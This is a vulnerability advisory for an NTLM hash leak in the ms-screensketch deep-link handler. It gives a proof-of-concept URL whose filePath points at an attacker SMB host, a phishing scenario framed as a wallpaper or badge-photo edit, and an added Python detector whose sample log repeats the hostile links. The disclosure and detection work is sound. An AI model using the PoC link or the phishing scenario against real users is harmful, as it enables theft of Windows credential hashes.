One‑Click NTLM Leak in ms‑screensketch: How the Vulnerability Works
Researchers discovered that certain versions of the Windows screenshot tool ms‑screensketch register a deep‑link URI whose filePath parameter can force an authenticated SMB connection, allowing a remote attacker to capture the user’s Net‑NTLM hash after the victim clicks a malicious link.
Vulnerability Overview
Specific releases of the Windows screenshot application ms-screensketch register the ms-screensketch deep‑link protocol in their app manifest. The protocol’s filePath parameter is not validated, so it can be crafted to force an authenticated SMB connection to an arbitrary server, causing the user’s Net‑NTLM hash to be transmitted. The relevant manifest entry:
<Extensions>
  <uap:Extension Category="windows.protocol">
    <uap:Protocol Name="ms-screensketch" DesiredView="default"/>
  </uap:Extension>
  ...
</Extensions>
Proof of Concept
Deploy an SMB listener on a server controlled by the attacker.
In a browser, open a URL that invokes the deep‑link and points to the attacker’s SMB server.
ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast
Attack Scenario
The screenshot tool automatically opens remote resources. An attacker can host a URL that appears to be a direct image link, for example https://snip.example.com/wallpaper/image.png. The page serves an HTML payload that triggers the deep‑link, causing the tool to launch, open the remote SMB share, and perform NTLM authentication silently in the background. Social engineering can increase credibility by framing the link as a request to edit a company wallpaper or badge photo.
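A defensive counterpart to the scenario above, added here as an example and not taken from the advisory or the blackarrowsec repository: a small Python filter that parses ms-screensketch: deep links found in mail bodies or link-extraction logs, pulls out filePath, and flags values that name a UNC host outside an allow-list, since those are the links that would make the tool authenticate over SMB to a host the attacker controls. The function names, the sample log lines and every host other than snip.blackarrow.lab are constructed; treating //host/ like \\host\ and matching parameter names case-insensitively are conservative assumptions for a detector, not behaviour documented on this page.

```python
"""Flag ms-screensketch deep links whose filePath names a remote UNC host.

Added detection example (not from the advisory or the blackarrowsec repo).
Intended for a mail-gateway link filter, a SIEM rule, or a triage script.
"""
import re
from urllib.parse import parse_qs

SCHEME = "ms-screensketch"

# UNC prefix after parse_qs has percent-decoded the value: \\host\... .
# Forward slashes are accepted too (assumption: treat //host/ like \\host\).
UNC_RE = re.compile(r"^[\\/]{2}([^\\/?#]+)[\\/]")

# Loopback names never cause an outbound SMB authentication.
LOOPBACK = frozenset({"localhost", "127.0.0.1", "::1"})

# Pulls ms-screensketch: links out of free text (mail body, HTML, log line).
LINK_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)


def parse_screensketch_link(link):
    """Split 'ms-screensketch:<action>?<query>' into action and lower-cased params.
    Returns None when the link uses another scheme."""
    scheme, sep, rest = link.partition(":")
    if not sep or scheme.lower() != SCHEME:
        return None
    action, _, query = rest.partition("?")
    # parse_qs skips the empty pair created by the leading '&' in the PoC URL,
    # percent-decodes values and collects repeats; keep the last value seen.
    params = {k.lower(): v[-1]
              for k, v in parse_qs(query, keep_blank_values=True).items()}
    return {"action": action, "params": params}


def unc_host(file_path):
    """Return the host named by a UNC filePath, or None for a local path."""
    m = UNC_RE.match(file_path.strip())
    return m.group(1) if m else None


def classify_link(link, trusted_hosts=frozenset()):
    """Return one of: not-screensketch, no-filepath, local-path,
    trusted-unc, remote-unc (the case that leaks Net-NTLM)."""
    parsed = parse_screensketch_link(link)
    if parsed is None:
        return "not-screensketch"
    file_path = parsed["params"].get("filepath")
    if not file_path:
        return "no-filepath"
    host = unc_host(file_path)
    if host is None:
        return "local-path"
    if host.lower() in LOOPBACK or host.lower() in trusted_hosts:
        return "trusted-unc"
    return "remote-unc"


def find_remote_unc_links(text, trusted_hosts=frozenset()):
    """Return (link, host) for every link in text that would authenticate
    to a host outside trusted_hosts."""
    hits = []
    for m in LINK_RE.finditer(text):
        link = m.group(0)
        if classify_link(link, trusted_hosts) == "remote-unc":
            host = unc_host(parse_screensketch_link(link)["params"]["filepath"])
            hits.append((link, host))
    return hits


# Constructed sample: link-extraction output from a mail gateway. The first
# link is the advisory's PoC URL; the other hosts are made up.
SAMPLE_LINES = r"""
2026-04-15T09:12:03Z msg=001 link=ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast
2026-04-15T09:13:44Z msg=002 link=ms-screensketch:edit?filePath=C:\Users\alice\Pictures\shot.png
2026-04-15T09:15:10Z msg=003 link=ms-screensketch:edit?filePath=%5C%5Cfileserver.corp.example%5Cshots%5Ca.png
2026-04-15T09:16:02Z msg=004 link=ms-screensketch:edit?filePath=%5C%5C203.0.113.7%5Cpub%5Cbadge.png
2026-04-15T09:17:30Z msg=005 link=https://snip.example.com/wallpaper/image.png
"""

TRUSTED = frozenset({"fileserver.corp.example"})

if __name__ == "__main__":
    for link, host in find_remote_unc_links(SAMPLE_LINES, TRUSTED):
        print(f"ALERT remote UNC host {host}: {link}")
```

Run against the constructed sample, only the PoC link and the 203.0.113.7 link are reported; the local path, the allow-listed file server and the https link are ignored. The allow-list is the knob worth tuning: internal file servers that legitimately appear in filePath belong in it, anything else that names a host is the pattern the advisory describes.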
Mitigation
Install the security update released by Microsoft on 2026‑04‑14, which patches the deep‑link validation flaw.
Disclosure Timeline
2026‑03‑23 – Vulnerability reported to the vendor.
2026‑04‑14 – Vendor released the fix.
2026‑04‑14 – Coordinated public disclosure.
References
CVE-2026-33829
GitHub repository: https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829
Black & White Path